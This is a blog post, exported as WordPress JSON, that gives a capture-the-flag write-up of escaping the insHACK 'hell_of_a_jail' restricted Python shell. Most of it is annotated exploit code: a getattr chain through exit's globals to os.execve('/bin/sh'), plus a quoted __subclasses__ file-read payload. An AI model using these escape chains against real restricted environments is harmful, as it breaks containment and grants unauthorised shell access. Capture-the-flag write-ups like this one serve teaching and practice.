{"id":146,"date":"2019-05-06T10:00:05","date_gmt":"2019-05-06T10:00:05","guid":{"rendered":"http:\/\/robertmccallum.nl\/?p=146"},"modified":"2019-05-06T10:02:20","modified_gmt":"2019-05-06T10:02:20","slug":"escaping-a-python-jail","status":"publish","type":"post","link":"http:\/\/robertmccallum.nl\/index.php\/2019\/05\/06\/escaping-a-python-jail\/","title":{"rendered":"Escaping a python jail."},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Write-up for the insHACK hell_of_a_jail challenge.<\/h2>\n\n\n<pre>   ###############################################################\n  #  Challenge\n #  desc:          [ hell_of_a_jail - PWN 150 ]\n#\n#       A guy from FBI found about your Ruby programming activities\n#       and has put you inside a python Jail ! Find your way out !\n#\n ##################################################################\n#:'\n#  Provided is an ssh key, server address and port to connect to.\n#       -p2222  user@hell-of-a-jail.ctf.insecurity-insa.fr\n#\n#  After logging into the server I got a nice welcome message\n#                     and a python shell.\n#  But not just any shell: a shell that would trim off all\n#  input longer than 14 characters, with only 3 functions to use,\n#  that removed all dots and double underscores and would spam your\n#  screen a thousand times with the phrase \"TROLLED !!!!\" if a double\n#     quote occurred in the input.\n#   _________________________________________________________________\n#  |To make matters even worse the challenge was in python3.         |\n#  |Which would spam my screen with messages like,                   |\n#  |Missing parentheses in call to 'print'. Did you mean print(\"A\")? 
|\n# ,+----------------------------------------------------------------=+\n ###################################################################\n#\n#  To check what functions I was allowed to use out of the box,\n#  I ran this on my local machine and copied the output to the server\n#         +---------------------------------+\n#         | &gt;&gt;&gt; for x in dir(__builtins__): |\n#         | ...     print('%s()'%x)         |\n#         +---------------------------------+\n#  Then I scrolled through the error messages to check what functions\n#  were still alive and available.\n#  Turns out the only built-in functions I got to play with were:\n#\n#          print(),     exit()    getattr()\n#\n#  The last one I had never used before, but we became good friends\n#                                          during this challenge.\n######################################\n#       [ CUTE NAMED FUNCTIONS ]      #\n#                                     #\nG=getattr       # G (fun)  getattr    #  Because of the 15 character\nP=print         # P (fun)  print      #  limit I decided to rename them\nE=exit          # E (fun)  exit       #  to something shorter,\n#                                     #  as I also had to do with\n#######################################  most of the strings.\n#              SOME USEFUL STRINGS    #\nu='_'+'_'       # u (str)  __         #    While trying to explore the\nc=u+'class'+u   # c (str)  __class__  #  possibilities (or lack thereof)\ncc=u+'call'+u   #cc (str)  __call__   #  I realized soon enough that\ncd=u+'code'+u   #cd (str)  __code__   #  the timeout on the server was\nd=u+'dir'+u     # d (str)  __dir__    #   annoyingly short, it\ndd=u+'doc'+u    #dd (str)  __doc__    #   also didn't autocomplete\nb=u+'bases'+u   # b (str)  __bases__  #   on tab and was printing\ns=(u+'subclas'  # s (str)  __subclasses__   escape codes instead of moving\n 'ses'+u)                             #   my cursor back.\nss='self'       #ss (str)  self       #   I 
quickly moved to working\nh='\/bin\/sh'     #h  (str)  \/bin\/sh    #   in this script instead.\nf='.\/flag.txt'  # f (str)  .\/flag.txt #\nff=u+'file'+u   #ff (str)  __file__   #   This would also allow me to\nfg=u+'flags'+u  #fg (str)  __flags__  #   neatly organize my collection\no='open'        # o (str)  open       #     of useful strings\nr='read'        # r (str)  read       #      'n other things.\ne='execve'      # e (str)  execve     #   My initial thought was to\nm=u+'mro'+u     # m (str)  __mro__    #  create something similar to:\nn=u+'name'+u    # n (str)  __name__   #  ().__class__.__bases__[0].__subclasses__()[40](\".\/key\").read()\na='append'      # a (str)  append     #  which I've seen and even used\ng=(u+'globals'  # g (str)   __globals__  before, but I never fully\n ''+u)                                #  understood what was going on.\nl=u+'locals'+u  # l (str)  __locals__ #  After a lot of time READING\nv=('co_varnam'  # v (str)  co_varnames#    python documentation\n 'es')                                #  I realized the functions\nen='environ'    #en (str)  environ    #  that I wanted to use were\n#------------------------------------ #  removed from __subclasses__.\n#  I spent a lot of time browsing around this python class space,\n#  reading writeups and documentation, trying to figure out how to\n#  defeat this beast. I READ about how to use getattr to access attributes\n#  from objects, I READ even more about this strange object oriented\n#  world named python and exploring with __mro__ __subclasses__ and __dir__.\n#  But what I should have READ a little bit better was:\n#  !!!!! THE welcome MESSAGE coming FROM the SERVER. !!!!!!!!\n#  There was a big BIG big hint in there pointing towards the exit().\n#  It was only when I was rearranging my terminal windows, and closing\n#  the billion python documentation tabs in my browser, 
when I\n#  accidentally opened the ssh connection and wanted to close it with\n#  CTRL+D, but that didn't work because quit() wasn't there, so I typed\n#  exit() and I got prompted with an error telling me that exit() requires 1\n#  argument... And then my eye caught the Welcome message.\n#  +------------------------------------------------------+\n#  [Oh my jail ! You need to exit() with the correct key. ]\n#  [It might make you free (and give you the flag)        ]\n#  +------------------------------------------------------+\n#  After I saw this I knew I was looking in the wrong places,\n#  and I focused my attention on the object named quit,\n#  which was holding a lot of goodies like __globals__\n#  with an os object.\n#\n#  So I quickly built an OBJchain.(Tm) and ran to the nearest exit.\n#  (Which for me was '\/bin\/sh'; I had everything already prepared\n#  and ready to open a file or pop a shell.)\n#\n###########################################################\n#             [VERY USEFUL THINGEMAGADGETS]\nC=G(E,c)       # C (Obj)  exit.__class__\nB=G(C,b)       # B (Obj)  exit.__class__.__bases__\nD=G(C,d)       # D (Fun)  exit.__class__.__dir__\nS=G(B[0],s)    # S (Obj)  exit.__class__.__bases__[0].__subclasses__\nM=G(C,m)       # M (Obj)  exit.__class__.__mro__\nX=G(E,g)       # X (Dic)  exit.__globals__\nO=X['os']      # O (Obj)  exit.__globals__['os']\nY=G(O,en)      # Y (Dic)  exit.__globals__['os'].environ\nF=G(O,e)       # F (Obj)  exit.__globals__['os'].execve\nF(h,[h],Y)     #          exit.__globals__['os'].execve('\/bin\/sh',['\/bin\/sh'],os.environ)\n#\n########################################################\n#\n#  So after popping the shell I was a bit confused about the\n#  absence of the flag.txt I had been craving for all these hours.\n#  The only thing besides me in the path I ended up in was jail.pyc,\n#  but I remembered the welcome message said something about keys and exits,\n#  so I checked it for strings, hoping it would hold a flag,\n#  which it didn't. 
So I wrapped it in some base64 and copied it to my local\n#  machine to decompile.\n#\n#  +----------------------------------------------------------------------+\n#  |def exit(arg):                                                        |\n#  |    \"\"\"Must invoke with the right arg in order to get the flag.\"\"\"    |\n#  |    if arg == os.environ['0f4d0db3668dd58cabb9eb409657eaa8']:         |\n#  |        print('Oh no ! You managed to escape\\nValidate with the key') |\n#  |        return sys.exit(0)                                            |\n#  |    print('Wrong key')                                                |\n#  +----------------------------------------------------------------------+\n#                                                                         #\n#  So yeah... The flag was hiding in environment variables:\n#  INSA{688a3188bcd888ad4540da2ac73c94ae9f55ded00ed1742c4388bb7c3285acd2} #\n#   I had a lot of fun and learned a lot during this challenge.         #\n #    Shout out tO My team Mates.                                    #\n  #                                  -xXx-    TNX FOR READING...  #\n   #\n     #####M42D##################'''''''''''''''''''''''''''''''\n<\/pre>","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-146","post","type-post","status-publish","format-standard","hentry","category-geen-categorie"],"_links":{"self":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/comments?post=146"}],"version-history":[{"count":4,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/146\/revisions"}],"predecessor-version":[{"id":150,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/146\/revisions\/150"}],"wp:attachment":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/media?parent=146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/categories?post=146"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/tags?post=146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}